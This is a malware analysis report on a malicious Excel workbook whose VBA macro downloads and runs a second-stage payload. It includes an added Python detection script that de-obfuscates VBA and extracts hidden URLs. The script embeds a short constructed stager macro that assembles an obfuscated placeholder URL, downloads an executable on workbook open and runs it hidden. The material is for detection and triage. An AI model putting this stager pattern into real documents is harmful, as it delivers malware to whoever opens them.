Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 d39aaa321588e8b1…

MALICIOUS

Office (OLE) / .XLS

Size: 68.5 KB
Created: 2022-03-22 08:56:04
First seen: 2022-03-22
MD5: 14542a3509c7fbc2888a5962ee69e07c
SHA-1: 35b25bf8995b84ce155e35b8d878d89a39d14ecd
SHA-256: d39aaa321588e8b1e8fe694732b533be31c57b60a3c1b7cf73047974606c0c64
Risk score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer
T1059.003 Command and Scripting Interpreter: Windows Command Shell

The sample is an XLS workbook (OLE2 compound file) containing VBA macros. The macro code references the URLDownloadToFile API (urlmon.dll), which downloads a file from a URL to local disk; in a document macro this is the standard first-stage downloader pattern for fetching a second-stage payload. References to the CreateProcess API and to CreateObject indicate that the downloaded file is then executed. No download URL is visible in plain text in the decoded macro source, so the target may be assembled at runtime (string concatenation, Chr() calls or similar obfuscation) or may not have been recovered by static analysis. The verdict therefore rests on the critical heuristic firings rather than on an observed network indicator; a sandbox run or manual de-obfuscation of the macro is needed to recover the URL and the dropped file name.

Heuristics (5)

  • [critical] SC_STR_URLDOWNLOAD: Reference to URLDownloadToFile API
  • [critical] OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA
  • [high] SC_STR_CREATEPROCESS: Reference to CreateProcess API
  • [high] OLE_VBA_CREATEOBJ: CreateObject call
  • [medium] OLE_VBA_MACROS: Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   10344 bytes
SHA-256 (macros.bas): c886030597a4a1b5a7c3b418d496c6caa71a748b840bf880273ad521505f7226
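The heuristics above are string matches over the decoded macro, and the analysis notes that no URL is visible even though the downloader API is referenced. The following added Python example (not the scanner's own code, and not the sample's macro) shows what a triage step over an artifact such as macros.bas looks like: it normalises a VBA module (joins continuation lines, strips comments, folds Chr() calls and "a" & "b" concatenations back into one literal), lists Declare statements including Alias renames, extracts any URL that becomes visible, and then applies the report's VBA-level heuristic IDs and severities. SAMPLE_VBA and its example.invalid URL are constructed for the demo; the oletools call in scan_file uses the real olevba API (the same extractor that produced macros.bas here) but is an optional dependency and is not exercised by the constructed sample.

```python
"""Triage a decoded VBA module such as the macros.bas artifact above.
Added example, not the scanner behind this report; heuristic IDs and severities
are copied from the report, the matching logic is a simplification of them."""
import re
from dataclasses import dataclass

# Only VBA-level heuristics are modelled; the SC_STR_* rules match raw file bytes.
RULES = (
    ("OLE_VBA_DOWNLOAD", "critical", "URLDownloadToFile in VBA", r"\bURLDownloadToFile[AW]?\b"),
    ("SC_STR_CREATEPROCESS", "high", "Reference to CreateProcess API", r"\bCreateProcess[AW]?\b"),
    ("OLE_VBA_CREATEOBJ", "high", "CreateObject call", r"\bCreateObject\s*\("),
    ("OLE_VBA_MACROS", "medium", "Document contains VBA macro code",
     r"^[ \t]*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+\w+"),
)
DECLARE = re.compile(r'\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
                     r'(?:\s+Alias\s+"([^"]+)")?', re.I)
URL = re.compile(r"""https?://[^\s"'<>()]+""", re.I)
CHR_CALL = re.compile(r"\bChr\$?\(\s*(\d{1,3})\s*\)", re.I)
CONCAT = re.compile(r'"([^"\n]*)"\s*&\s*"([^"\n]*)"')

@dataclass(frozen=True)
class Hit:
    heuristic: str
    severity: str
    description: str
    line: int      # line in the normalised text (continuation lines already joined)
    evidence: str

def strip_comment(line):
    """Cut a trailing ' comment, ignoring apostrophes inside "..." literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def normalize(src):
    """Join ' _' continuations, drop comments, fold Chr(n) and "a" & "b" into one literal."""
    src = re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)
    src = "\n".join(strip_comment(l) for l in src.splitlines())
    # Fold printable characters only; Chr(34) would open a quote and is left alone.
    src = CHR_CALL.sub(lambda m: '"%c"' % int(m.group(1))
                       if 32 <= int(m.group(1)) <= 126 and int(m.group(1)) != 34 else m.group(0), src)
    while True:                       # repeat until no adjacent literal pair remains
        src, n = CONCAT.subn(lambda m: '"%s%s"' % (m.group(1), m.group(2)), src)
        if n == 0:
            return src

def declared_apis(src):
    """(VBA name, DLL, exported name) for every Declare statement; catches Alias renames."""
    return [(m.group(1), m.group(2), m.group(3) or m.group(1)) for m in DECLARE.finditer(normalize(src))]

def extract_urls(src):
    """URLs that become visible once string building has been folded."""
    return sorted(set(URL.findall(normalize(src))))

def scan(src):
    """Fire each heuristic at most once, recording the first matching line and token."""
    text, hits = normalize(src), []
    for hid, sev, desc, pat in RULES:
        m = re.search(pat, text, re.I | re.M)
        if m:
            hits.append(Hit(hid, sev, desc, text.count("\n", 0, m.start()) + 1, m.group(0)))
    return hits

def scan_file(path):
    """Pull every module out of an OLE/OOXML file with oletools (real API) and scan it."""
    from oletools.olevba import VBA_Parser   # optional dependency: pip install oletools
    parser, out = VBA_Parser(path), {}
    if parser.detect_vba_macros():
        for _fname, _stream, vba_filename, vba_code in parser.extract_macros():
            out[vba_filename] = scan(vba_code)
    parser.close()
    return out

# Constructed stager module for the demo; the .invalid domain is reserved, not a real IOC.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Workbook_Open()
    ' URL split across literals and a Chr() call so a plain grep for http:// misses it
    Dim u As String, p As String
    u = "htt" & "p://" & "example" & Chr(46) & "invalid/stage2.exe"
    p = Environ("TEMP") & "\up.exe"
    URLDownloadToFileA 0, u, p, 0, 0
    CreateObject("WScript.Shell").Run p, 0, False
End Sub
'''

if __name__ == "__main__":
    for h in scan(SAMPLE_VBA):
        print(f"[{h.severity}] {h.heuristic} line {h.line}: {h.evidence}")
    print("declares:", declared_apis(SAMPLE_VBA))
    print("urls:", extract_urls(SAMPLE_VBA))
```

On the constructed module the raw text contains no `http://` at all, yet after folding the URL is recovered and the critical downloader heuristic fires on the Declare line, which is the situation the analysis above describes. The folding is deliberately simple (no `""` escapes inside literals, no `StrReverse`, `Replace` or array-based decoding), so a missing URL after this pass still means the macro deserves a sandbox run or manual de-obfuscation, not that no download target exists.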